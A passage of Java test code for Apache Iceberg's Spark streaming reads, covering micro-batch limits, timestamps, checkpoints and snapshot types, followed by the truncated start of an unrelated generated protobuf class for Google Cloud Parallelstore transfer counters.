            + "TBLPROPERTIES ('commit.manifest.min-count-to-merge'='3', 'commit.manifest-merge.enabled'='true')",
        tableName);
    this.table = validationCatalog.loadTable(tableIdent);
    microBatches.set(0);
  }

  @AfterEach
  public void stopStreams() throws TimeoutException {
    for (StreamingQuery query : spark.streams().active()) {
      query.stop();
    }
  }

  @AfterEach
  public void removeTables() {
    sql("DROP TABLE IF EXISTS %s", tableName);
  }

  @TestTemplate
  public void testReadStreamOnIcebergTableWithMultipleSnapshots() throws Exception {
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expected);

    StreamingQuery query = startStream();

    List<SimpleRecord> actual = rowsAvailable(query);
    assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected));
  }

  @TestTemplate
  public void testReadStreamWithMaxFiles1() throws Exception {
    appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS);
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L));
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L),
        Trigger.AvailableNow());
  }

  @TestTemplate
  public void testReadStreamWithMaxFiles2() throws Exception {
    appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS);
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "2"),
        List.of(3L, 2L, 2L));
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "2"),
        List.of(3L, 2L, 2L),
        Trigger.AvailableNow());
  }

  @TestTemplate
  public void testReadStreamWithMaxRows1() throws Exception {
    appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS);
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L));
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L),
        Trigger.AvailableNow());

    // soft limit of 1 is being enforced, the stream is not blocked.
    StreamingQuery query = startStream(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1");
    List<SimpleRecord> actual = rowsAvailable(query);
    assertThat(actual)
        .containsExactlyInAnyOrderElementsOf(Iterables.concat(TEST_DATA_MULTIPLE_SNAPSHOTS));
  }

  @TestTemplate
  public void testReadStreamWithMaxRows2() throws Exception {
    appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS);
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"),
        List.of(3L, 2L, 2L));
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"),
        List.of(3L, 2L, 2L),
        Trigger.AvailableNow());

    StreamingQuery query =
        startStream(ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"));
    List<SimpleRecord> actual = rowsAvailable(query);
    assertThat(actual)
        .containsExactlyInAnyOrderElementsOf(Iterables.concat(TEST_DATA_MULTIPLE_SNAPSHOTS));
  }

  @TestTemplate
  public void testReadStreamWithMaxRows4() throws Exception {
    appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS);
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"),
        List.of(4L, 3L));
    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"),
        List.of(4L, 3L),
        Trigger.AvailableNow());
  }

  @TestTemplate
  public void testReadStreamWithCompositeReadLimit() throws Exception {
    appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS);
    assertMicroBatchRecordSizes(
        ImmutableMap.of(
            SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4",
            SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L));
    assertMicroBatchRecordSizes(
        ImmutableMap.of(
            SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1",
            SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L),
        Trigger.AvailableNow());
  }

  @TestTemplate
  public void testAvailableNowStreamReadShouldNotHangOrReprocessData() throws Exception {
    File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile();
    File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint");
    File output = temp.resolve("junit").toFile();

    DataStreamWriter<Row> querySource =
        spark
            .readStream()
            .format("iceberg")
            .load(tableName)
            .writeStream()
            .option("checkpointLocation", writerCheckpoint.toString())
            .format("parquet")
            .trigger(Trigger.AvailableNow())
            .option("path", output.getPath());

    List<SimpleRecord> expected = Lists.newArrayList();
    for (List<List<SimpleRecord>> expectedCheckpoint :
        TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS) {
      // New data was added while the stream was not running
      appendDataAsMultipleSnapshots(expectedCheckpoint);
      expected.addAll(Lists.newArrayList(Iterables.concat(Iterables.concat(expectedCheckpoint))));

      try {
        StreamingQuery query = querySource.start();
        // Query should terminate on its own after processing all available data
        assertThat(query.awaitTermination(60000)).isTrue();

        // Check output
        List<SimpleRecord> actual =
            spark
                .read()
                .load(output.getPath())
                .as(Encoders.bean(SimpleRecord.class))
                .collectAsList();
        assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected));

        // Restarting immediately should not reprocess data
        query = querySource.start();
        assertThat(query.awaitTermination(60000)).isTrue();
        assertThat(query.recentProgress()).hasSize(1);
        assertThat(query.recentProgress()[0].sources()[0].startOffset())
            .isEqualTo(query.recentProgress()[0].sources()[0].endOffset());
      } finally {
        stopStreams();
      }
    }
  }

  @TestTemplate
  public void testTriggerAvailableNowDoesNotProcessNewDataWhileRunning() throws Exception {
    List<List<SimpleRecord>> expectedData = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expectedData);
    long expectedRecordCount = expectedData.stream().mapToLong(List::size).sum();

    table.refresh();
    long expectedSnapshotId = table.currentSnapshot().snapshotId();

    String sinkTable = "availablenow_sink";
    StreamingQuery query =
        spark
            .readStream()
            .option(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1")
            .format("iceberg")
            .load(tableName)
            .writeStream()
            .format("memory")
            .queryName(sinkTable)
            .trigger(Trigger.AvailableNow())
            .start();

    assertThat(query.isActive()).isTrue();

    // Add new data while the stream is running
    List<SimpleRecord> newDataDuringStreamSnap1 =
        Lists.newArrayList(
            new SimpleRecord(100, "hundred"),
            new SimpleRecord(101, "hundred-one"),
            new SimpleRecord(102, "hundred-two"));
    List<SimpleRecord> newDataDuringStreamSnap2 =
        Lists.newArrayList(
            new SimpleRecord(200, "two-hundred"), new SimpleRecord(201, "two-hundred-one"));
    appendData(newDataDuringStreamSnap1);
    appendData(newDataDuringStreamSnap2);

    // Query should terminate on its own after processing all available data till expectedSnapshotId
    assertThat(query.awaitTermination(60000)).isTrue();

    List<SimpleRecord> actualResults =
        spark
            .sql("SELECT * FROM " + sinkTable)
            .as(Encoders.bean(SimpleRecord.class))
            .collectAsList();

    long endOffsetSnapshotId =
        StreamingOffset.fromJson(query.lastProgress().sources()[0].endOffset()).snapshotId();

    // Verify the stream processed only up to the snapshot present when started
    assertThat(endOffsetSnapshotId).isEqualTo(expectedSnapshotId);
    // Verify only the initial data was processed
    assertThat(actualResults).hasSize((int) expectedRecordCount);
    assertThat(actualResults).containsExactlyInAnyOrderElementsOf(Iterables.concat(expectedData));
  }

  @TestTemplate
  public void testReadStreamOnIcebergThenAddData() throws Exception {
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;

    StreamingQuery query = startStream();

    appendDataAsMultipleSnapshots(expected);

    List<SimpleRecord> actual = rowsAvailable(query);
    assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected));
  }

  @TestTemplate
  public void testReadingStreamFromTimestamp() throws Exception {
    List<SimpleRecord> dataBeforeTimestamp =
        Lists.newArrayList(
            new SimpleRecord(-2, "minustwo"),
            new SimpleRecord(-1, "minusone"),
            new SimpleRecord(0, "zero"));

    appendData(dataBeforeTimestamp);

    table.refresh();
    long streamStartTimestamp = table.currentSnapshot().timestampMillis() + 1;

    StreamingQuery query =
        startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(streamStartTimestamp));

    // Records committed before the start timestamp must not be read
    List<SimpleRecord> empty = rowsAvailable(query);
    assertThat(empty).isEmpty();

    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expected);

    List<SimpleRecord> actual = rowsAvailable(query);

    assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected));
  }

  @TestTemplate
  public void testReadingStreamFromFutureTimestamp() throws Exception {
    long futureTimestamp = System.currentTimeMillis() + 10000;

    StreamingQuery query =
        startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(futureTimestamp));

    List<SimpleRecord> actual = rowsAvailable(query);
    assertThat(actual).isEmpty();

    List<SimpleRecord> data =
        Lists.newArrayList(
            new SimpleRecord(-2, "minustwo"),
            new SimpleRecord(-1, "minusone"),
            new SimpleRecord(0, "zero"));

    // Perform several inserts that should not show up because the fromTimestamp has not elapsed
    IntStream.range(0, 3)
        .forEach(
            x -> {
              appendData(data);
              assertThat(rowsAvailable(query)).isEmpty();
            });

    waitUntilAfter(futureTimestamp);

    // Data appended after the timestamp should appear
    appendData(data);
    actual = rowsAvailable(query);
    assertThat(actual).containsExactlyInAnyOrderElementsOf(data);
  }

  @TestTemplate
  public void testReadingStreamFromTimestampFutureWithExistingSnapshots() throws Exception {
    List<SimpleRecord> dataBeforeTimestamp =
        Lists.newArrayList(
            new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three"));
    appendData(dataBeforeTimestamp);

    long streamStartTimestamp = System.currentTimeMillis() + 2000;

    // Start the stream with a future timestamp after the current snapshot
    StreamingQuery query =
        startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(streamStartTimestamp));
    List<SimpleRecord> actual = rowsAvailable(query);
    assertThat(actual).isEmpty();

    // Stream should contain data added after the timestamp elapses
    waitUntilAfter(streamStartTimestamp);
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expected);
    assertThat(rowsAvailable(query))
        .containsExactlyInAnyOrderElementsOf(Iterables.concat(expected));
  }

  @TestTemplate
  public void testReadingStreamFromTimestampOfExistingSnapshot() throws Exception {
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;

    // Create an existing snapshot with some data
    appendData(expected.get(0));
    table.refresh();
    long firstSnapshotTime = table.currentSnapshot().timestampMillis();

    // Start stream giving the first Snapshot's time as the start point
    StreamingQuery stream =
        startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(firstSnapshotTime));

    // Append rest of expected data
    for (int i = 1; i < expected.size(); i++) {
      appendData(expected.get(i));
    }

    List<SimpleRecord> actual = rowsAvailable(stream);
    assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected));
  }

  @TestTemplate
  public void testReadingStreamWithExpiredSnapshotFromTimestamp() throws TimeoutException {
    List<SimpleRecord> firstSnapshotRecordList = Lists.newArrayList(new SimpleRecord(1, "one"));

    List<SimpleRecord> secondSnapshotRecordList = Lists.newArrayList(new SimpleRecord(2, "two"));

    List<SimpleRecord> thirdSnapshotRecordList = Lists.newArrayList(new SimpleRecord(3, "three"));

    List<SimpleRecord> expectedRecordList = Lists.newArrayList();
    expectedRecordList.addAll(secondSnapshotRecordList);
    expectedRecordList.addAll(thirdSnapshotRecordList);

    appendData(firstSnapshotRecordList);
    table.refresh();
    long firstSnapshotId = table.currentSnapshot().snapshotId();
    long firstSnapshotCommitTime = table.currentSnapshot().timestampMillis();

    appendData(secondSnapshotRecordList);
    appendData(thirdSnapshotRecordList);

    // Expire the first snapshot; the stream should still start from its commit time
    table.expireSnapshots().expireSnapshotId(firstSnapshotId).commit();
    StreamingQuery query =
        startStream(
            SparkReadOptions.STREAM_FROM_TIMESTAMP, String.valueOf(firstSnapshotCommitTime));

    List<SimpleRecord> actual = rowsAvailable(query);
    assertThat(actual).containsExactlyInAnyOrderElementsOf(expectedRecordList);
  }

  @TestTemplate
  public void testResumingStreamReadFromCheckpoint() throws Exception {
    File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile();
    File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint");
    File output = temp.resolve("junit").toFile();

    DataStreamWriter<Row> querySource =
        spark
            .readStream()
            .format("iceberg")
            .load(tableName)
            .writeStream()
            .option("checkpointLocation", writerCheckpoint.toString())
            .format("parquet")
            .queryName("checkpoint_test")
            .option("path", output.getPath());

    StreamingQuery startQuery = querySource.start();
    startQuery.processAllAvailable();
    startQuery.stop();

    List<SimpleRecord> expected = Lists.newArrayList();
    for (List<List<SimpleRecord>> expectedCheckpoint :
        TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS) {
      // New data was added while the stream was down
      appendDataAsMultipleSnapshots(expectedCheckpoint);
      expected.addAll(Lists.newArrayList(Iterables.concat(Iterables.concat(expectedCheckpoint))));

      // Stream starts up again from checkpoint read the newly added data and shut down
      StreamingQuery restartedQuery = querySource.start();
      restartedQuery.processAllAvailable();
      restartedQuery.stop();

      // Read data added by the stream
      List<SimpleRecord> actual =
          spark.read().load(output.getPath()).as(Encoders.bean(SimpleRecord.class)).collectAsList();
      assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected));
    }
  }

  @TestTemplate
  public void testFailReadingCheckpointInvalidSnapshot() throws IOException, TimeoutException {
    File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile();
    File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint");
    File output = temp.resolve("junit").toFile();

    DataStreamWriter<Row> querySource =
        spark
            .readStream()
            .format("iceberg")
            .load(tableName)
            .writeStream()
            .option("checkpointLocation", writerCheckpoint.toString())
            .format("parquet")
            .queryName("checkpoint_test")
            .option("path", output.getPath());

    List<SimpleRecord> firstSnapshotRecordList = Lists.newArrayList(new SimpleRecord(1, "one"));
    List<SimpleRecord> secondSnapshotRecordList = Lists.newArrayList(new SimpleRecord(2, "two"));

    StreamingQuery startQuery = querySource.start();

    appendData(firstSnapshotRecordList);
    table.refresh();
    long firstSnapshotId = table.currentSnapshot().snapshotId();

    startQuery.processAllAvailable();
    startQuery.stop();

    appendData(secondSnapshotRecordList);

    // Expiring the checkpointed snapshot must make the restarted stream fail
    table.expireSnapshots().expireSnapshotId(firstSnapshotId).commit();

    StreamingQuery restartedQuery = querySource.start();
    assertThatThrownBy(restartedQuery::processAllAvailable)
        .hasCauseInstanceOf(IllegalStateException.class)
        .hasMessageContaining(
            String.format(
                "Cannot load current offset at snapshot %d, the snapshot was expired or removed",
                firstSnapshotId));
  }

  @TestTemplate
  public void testParquetOrcAvroDataInOneTable() throws Exception {
    List<SimpleRecord> parquetFileRecords =
        Lists.newArrayList(
            new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three"));

    List<SimpleRecord> orcFileRecords =
        Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five"));

    List<SimpleRecord> avroFileRecords =
        Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven"));

    appendData(parquetFileRecords);
    appendData(orcFileRecords, "orc");
    appendData(avroFileRecords, "avro");

    StreamingQuery query = startStream();
    assertThat(rowsAvailable(query))
        .containsExactlyInAnyOrderElementsOf(
            Iterables.concat(parquetFileRecords, orcFileRecords, avroFileRecords));
  }

  @TestTemplate
  public void testReadStreamFromEmptyTable() throws Exception {
    StreamingQuery stream = startStream();
    List<SimpleRecord> actual = rowsAvailable(stream);
    assertThat(actual).isEmpty();
  }

  @TestTemplate
  public void testReadStreamWithSnapshotTypeOverwriteErrorsOut() throws Exception {
    // upgrade table to version 2 - to facilitate creation of Snapshot of type OVERWRITE.
    TableOperations ops = ((BaseTable) table).operations();
    TableMetadata meta = ops.current();
    ops.commit(meta, meta.upgradeToFormatVersion(2));

    // fill table with some initial data
    List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(dataAcrossSnapshots);

    Schema deleteRowSchema = table.schema().select("data");
    Record dataDelete = GenericRecord.create(deleteRowSchema);
    List<Record> dataDeletes =
        Lists.newArrayList(
            dataDelete.copy("data", "one") // id = 1
            );

    DeleteFile eqDeletes =
        FileHelpers.writeDeleteFile(
            table,
            Files.localOutput(File.createTempFile("junit", null, temp.toFile())),
            TestHelpers.Row.of(0),
            dataDeletes,
            deleteRowSchema);

    DataFile dataFile =
        DataFiles.builder(table.spec())
            .withPath(File.createTempFile("junit", null, temp.toFile()).getPath())
            .withFileSizeInBytes(10)
            .withRecordCount(1)
            .withFormat(FileFormat.PARQUET)
            .build();

    table.newRowDelta().addRows(dataFile).addDeletes(eqDeletes).commit();

    // check pre-condition - that the above Delete file write - actually resulted in snapshot of
    // type OVERWRITE
    assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.OVERWRITE);

    StreamingQuery query = startStream();

    assertThatThrownBy(query::processAllAvailable)
        .cause()
        .isInstanceOf(IllegalStateException.class)
        .hasMessageStartingWith("Cannot process overwrite snapshot");
  }

  @TestTemplate
  public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplace() throws Exception {
    // fill table with some data
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expected);

    makeRewriteDataFiles();

    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L));
  }

  @TestTemplate
  public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceMaxRows()
      throws Exception {
    // fill table with some data
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expected);

    makeRewriteDataFiles();

    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "4"),
        List.of(5L, 2L));
  }

  @TestTemplate
  public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceMaxFilesAndRows()
      throws Exception {
    // fill table with some data
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expected);

    makeRewriteDataFiles();

    assertMicroBatchRecordSizes(
        ImmutableMap.of(
            SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4",
            SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L));
  }

  @TestTemplate
  public void testReadStreamWithSnapshotType2RewriteDataFilesIgnoresReplace() throws Exception {
    // fill table with some data
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expected);

    makeRewriteDataFiles();

    makeRewriteDataFiles();

    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L));
  }

  @TestTemplate
  public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceFollowedByAppend()
      throws Exception {
    // fill table with some data
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expected);

    makeRewriteDataFiles();

    appendDataAsMultipleSnapshots(expected);

    assertMicroBatchRecordSizes(
        ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"),
        List.of(1L, 2L, 1L, 1L, 1L, 1L, 1L, 2L, 1L, 1L, 1L, 1L));
  }

  @TestTemplate
  public void testReadStreamWithSnapshotTypeReplaceIgnoresReplace() throws Exception {
    // fill table with some data
    List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(expected);

    // this should create a snapshot with type Replace.
    table.rewriteManifests().clusterBy(f -> 1).commit();

    // check pre-condition
    assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.REPLACE);

    StreamingQuery query = startStream();
    List<SimpleRecord> actual = rowsAvailable(query);
    assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected));
  }

  @TestTemplate
  public void testReadStreamWithSnapshotTypeDeleteErrorsOut() throws Exception {
    table.updateSpec().removeField("id_bucket").addField(ref("id")).commit();

    // fill table with some data
    List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(dataAcrossSnapshots);

    // this should create a snapshot with type delete.
    table.newDelete().deleteFromRowFilter(Expressions.equal("id", 4)).commit();

    // check pre-condition - that the above delete operation on table resulted in Snapshot of Type
    // DELETE.
    assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.DELETE);

    StreamingQuery query = startStream();

    assertThatThrownBy(query::processAllAvailable)
        .cause()
        .isInstanceOf(IllegalStateException.class)
        .hasMessageStartingWith("Cannot process delete snapshot");
  }

  @TestTemplate
  public void testReadStreamWithSnapshotTypeDeleteAndSkipDeleteOption() throws Exception {
    table.updateSpec().removeField("id_bucket").addField(ref("id")).commit();

    // fill table with some data
    List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(dataAcrossSnapshots);

    // this should create a snapshot with type delete.
    table.newDelete().deleteFromRowFilter(Expressions.equal("id", 4)).commit();

    // check pre-condition - that the above delete operation on table resulted in Snapshot of Type
    // DELETE.
    assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.DELETE);

    StreamingQuery query = startStream(SparkReadOptions.STREAMING_SKIP_DELETE_SNAPSHOTS, "true");
    assertThat(rowsAvailable(query))
        .containsExactlyInAnyOrderElementsOf(Iterables.concat(dataAcrossSnapshots));
  }

  @TestTemplate
  public void testReadStreamWithSnapshotTypeDeleteAndSkipOverwriteOption() throws Exception {
    table.updateSpec().removeField("id_bucket").addField(ref("id")).commit();

    // fill table with some data
    List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS;
    appendDataAsMultipleSnapshots(dataAcrossSnapshots);

    DataFile dataFile =
        DataFiles.builder(table.spec())
            .withPath(File.createTempFile("junit", null, temp.toFile()).getPath())
            .withFileSizeInBytes(10)
            .withRecordCount(1)
            .withFormat(FileFormat.PARQUET)
            .build();

    // this should create a snapshot with type overwrite.
    table
        .newOverwrite()
        .addFile(dataFile)
        .overwriteByRowFilter(Expressions.greaterThan("id", 4))
        .commit();

    // check pre-condition - that the above delete operation on table resulted in Snapshot of Type
    // OVERWRITE.
    assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.OVERWRITE);

    StreamingQuery query =
        startStream(SparkReadOptions.STREAMING_SKIP_OVERWRITE_SNAPSHOTS, "true");
    assertThat(rowsAvailable(query))
        .containsExactlyInAnyOrderElementsOf(Iterables.concat(dataAcrossSnapshots));
  }

  /**
   * Commits a REPLACE (rewrite-data-files) snapshot by rewriting every data file added by the
   * existing APPEND snapshots onto itself. Used to verify that streaming reads skip all files in a
   * rewrite snapshot.
   */
  public void makeRewriteDataFiles() {
    table.refresh();

    RewriteFiles rewrite = table.newRewrite();
    Iterable<Snapshot> it = table.snapshots();
    for (Snapshot snapshot : it) {
      if (snapshot.operation().equals(DataOperations.APPEND)) {
        Iterable<DataFile> datafiles = snapshot.addedDataFiles(table.io());
        for (DataFile datafile : datafiles) {
          rewrite.addFile(datafile);
          rewrite.deleteFile(datafile);
        }
      }
    }
    rewrite.commit();
  }

  /**
   * appends each list as a Snapshot on the iceberg table at the given location. accepts a list of
   * lists - each list representing data per snapshot.
   */
  private void appendDataAsMultipleSnapshots(List<List<SimpleRecord>> data) {
    for (List<SimpleRecord> l : data) {
      appendData(l);
    }
  }

  private void appendData(List<SimpleRecord> data) {
    appendData(data, "parquet");
  }

  private void appendData(List<SimpleRecord> data, String format) {
    Dataset<Row> df = spark.createDataFrame(data, SimpleRecord.class);
    df.select("id", "data")
        .write()
        .format("iceberg")
        .option("write-format", format)
        .mode("append")
        .save(tableName);
  }

  private static final String MEMORY_TABLE = "_stream_view_mem";

  // Starts a memory-sink stream over the test table; options apply to both reader and writer.
  private StreamingQuery startStream(Map<String, String> options) throws TimeoutException {
    return spark
        .readStream()
        .options(options)
        .format("iceberg")
        .load(tableName)
        .writeStream()
        .options(options)
        .format("memory")
        .queryName(MEMORY_TABLE)
        .outputMode(OutputMode.Append())
        .start();
  }

  private StreamingQuery startStream() throws TimeoutException {
    return startStream(Collections.emptyMap());
  }

  private StreamingQuery startStream(String key, String value) throws TimeoutException {
    return startStream(
        ImmutableMap.of(key, value, SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"));
  }

  private void assertMicroBatchRecordSizes(
      Map<String, String> options, List<Long> expectedMicroBatchRecordSize)
      throws TimeoutException {
    assertMicroBatchRecordSizes(options, expectedMicroBatchRecordSize, Trigger.ProcessingTime(0L));
  }

  // Runs a foreachBatch stream with the given options/trigger and checks per-batch record counts.
  private void assertMicroBatchRecordSizes(
      Map<String, String> options, List<Long> expectedMicroBatchRecordSize, Trigger trigger)
      throws TimeoutException {
    Dataset<Row> ds = spark.readStream().options(options).format("iceberg").load(tableName);

    List<Long> syncList = Collections.synchronizedList(Lists.newArrayList());
    ds.writeStream()
        .options(options)
        .trigger(trigger)
        .foreachBatch(
            (VoidFunction2<Dataset<Row>, Long>)
                (dataset, batchId) -> {
                  microBatches.getAndIncrement();
                  syncList.add(dataset.count());
                })
        .start()
        .processAllAvailable();

    stopStreams();
    assertThat(syncList).containsExactlyInAnyOrderElementsOf(expectedMicroBatchRecordSize);
  }

  private List<SimpleRecord> rowsAvailable(StreamingQuery query) {
    query.processAllAvailable();
    return spark
        .sql("select * from " + MEMORY_TABLE)
        .as(Encoders.bean(SimpleRecord.class))
        .collectAsList();
  }
}
googleapis/google-cloud-java
35,674
java-parallelstore/proto-google-cloud-parallelstore-v1/src/main/java/com/google/cloud/parallelstore/v1/TransferCounters.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/parallelstore/v1/parallelstore.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.parallelstore.v1; /** * * * <pre> * A collection of counters that report the progress of a transfer operation. * </pre> * * Protobuf type {@code google.cloud.parallelstore.v1.TransferCounters} */ public final class TransferCounters extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.parallelstore.v1.TransferCounters) TransferCountersOrBuilder { private static final long serialVersionUID = 0L; // Use TransferCounters.newBuilder() to construct. 
private TransferCounters(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private TransferCounters() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new TransferCounters(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.parallelstore.v1.ParallelstoreProto .internal_static_google_cloud_parallelstore_v1_TransferCounters_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.parallelstore.v1.TransferCounters.class, com.google.cloud.parallelstore.v1.TransferCounters.Builder.class); } public static final int OBJECTS_FOUND_FIELD_NUMBER = 1; private long objectsFound_ = 0L; /** * * * <pre> * Objects found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 objects_found = 1;</code> * * @return The objectsFound. */ @java.lang.Override public long getObjectsFound() { return objectsFound_; } public static final int BYTES_FOUND_FIELD_NUMBER = 2; private long bytesFound_ = 0L; /** * * * <pre> * Bytes found in the data source that are scheduled to be transferred, * excluding any that are filtered based on object conditions or skipped due * to sync. * </pre> * * <code>int64 